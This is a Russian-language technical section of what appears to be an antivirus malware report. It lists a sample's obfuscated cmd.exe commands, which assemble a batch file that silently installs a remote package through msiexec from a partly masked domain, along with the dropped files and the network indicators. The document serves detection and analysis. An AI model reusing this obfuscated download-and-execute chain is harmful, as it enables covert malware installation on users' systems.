Техническая информация
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^www^.eom-nv.com^/gift.php ">>%temp%\alpac...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\alpaca.bat
- %TEMP%\1176528.cvr
- 'eo##nv.com':80
- 'eo##nv.com':443
- http://www.eo##nv.com/gift.php
- 'eo##nv.com':443
- DNS ASK eo##nv.com
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^www^.eom-nv.com^/gift.php ">>%temp%\alpac...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" EChO"
- '<SYSTEM32>\cmd.exe' /S /D /c" SEt /p=" M^siexe" 1>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="c " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="^/i" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" http^:^/^/^www^.eom-nv.com^/gift.php " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" ^/q &exit" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\msiexec.exe' /ihttp://www.eo##nv.com/gift.php /q